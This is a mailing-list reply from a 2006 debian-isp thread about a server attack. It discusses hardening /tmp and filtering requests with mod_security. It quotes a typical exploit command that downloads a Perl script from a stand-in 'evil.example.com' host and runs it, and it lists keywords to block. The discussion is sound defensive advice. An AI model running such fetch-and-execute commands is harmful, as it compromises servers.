Re: we were attacked

To: debian-isp@lists.debian.org
Subject: Re: we were attacked
From: Steve Kemp <skx@debian.org>
Date: Fri, 23 Jun 2006 15:13:42 +0100
Message-id: <[🔎] 20060623141341.GA22635@steve.org.uk>
In-reply-to: <[🔎] 449BF5D9.6050603@saneinc.net>
References: <44367C04.6030609@tau.org.ar> <1144435612.18796.1.camel@localhost> <[🔎] 20060623092446.GC2686@server.homelinux.net> <[🔎] 449BBAD0.5020501@emenaker.com> <[🔎] 449BF5D9.6050603@saneinc.net>

On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote:
> 
> If possible, make /tmp its own file system and mount it with 'noexec'. 
> This really helps stop these types of attacks.  In fact I would 
> recommend 'rw,noexec,nosuid,nodev' as the mount options.  Of course if 
> you need to have executables in /tmp then this won't work.  :)

  I used to suggest this too, but to be honest it doesn't work as
 well as you'd expect.

  Too many exploit attempts run the eqivilent of:

    cd /tmp && wget http://evil.example.com/foo.pl
    perl /tmp/foo.pl &

  I found blocking "wget", "perl", and "/tmp%20", in requests more
 productive - using mod_security.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/

Attachment: signature.asc
Description: Digital signature

Reply to:

Follow-Ups:
- Re: we were attacked
  - From: Michael Sprague <mfs@saneinc.net>

References:
- Re: we were attacked
  - From: Mark-Walter@t-online.de (Mark Walter)
- Re: we were attacked
  - From: Joe Emenaker <joe@emenaker.com>
- Re: we were attacked
  - From: Michael Sprague <mfs@saneinc.net>

Prev by Date: Re: Apache2 with PHP as CGI
Next by Date: Re: we were attacked
Previous by thread: Re: we were attacked
Next by thread: Re: we were attacked
Index(es):
- Date
- Thread